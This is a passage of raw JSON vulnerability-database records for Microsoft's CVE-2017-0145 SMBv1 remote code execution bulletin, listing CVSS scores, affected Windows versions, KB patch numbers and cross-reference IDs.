"RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-11T11:22:34", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-11T11:22:34", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3205409", "KB4012213", "KB4012217", "KBMS16-110, 3187754", "KB3177186", "KB3212646", "KB4014077", "KB4012598", "KB4012606", "KB4012214", "KB4013429", "KB3210721", "KB4012215", "KB3213986", "KB4013198", "KB3205401", "KB3210720", "KB4012212", "KB4012216"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", 
"kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", 
"msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": 
"KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems 
Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 
x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-11T12:52:00", "differentElements": ["msAffectedSoftware"], "edition": 31}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "5909803c234c7ba25bf5a9f51be4ff6f", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", 
"availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-11T15:08:23", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "threatpost", "idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": 
["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-11T11:22:34", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-11T11:22:34", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012215", "KBMS16-110, 3187754", "KB3212646", "KB3210720", "KB4013198", "KB4012216", "KB3205401", "KB4012598", "KB4014077", "KB3210721", "KB4013429", "KB4012217", "KB4012606", "KB4012212", "KB4012213", "KB3205409", "KB3213986", "KB3177186", "KB4012214"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, 
{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": 
"", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", 
"kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-11T15:08:23", "differentElements": ["msAffectedSoftware"], "edition": 32}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "a5cb2f08ef111b264f0d461381e554af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-11T16:48:04", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/", 
"MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "threatpost", "idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", 
"RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-11T11:22:34", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-11T11:22:34", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3205401", "KB4014077", "KB4013198", "KB3210721", "KB4012214", "KBMS16-110, 3187754", "KB4012598", "KB4012215", "KB3177186", "KB3210720", "KB3212646", "KB4012217", "KB4013429", "KB3205409", "KB4012216", "KB3213986", "KB4012212", "KB4012606", "KB4012213"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", 
"kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 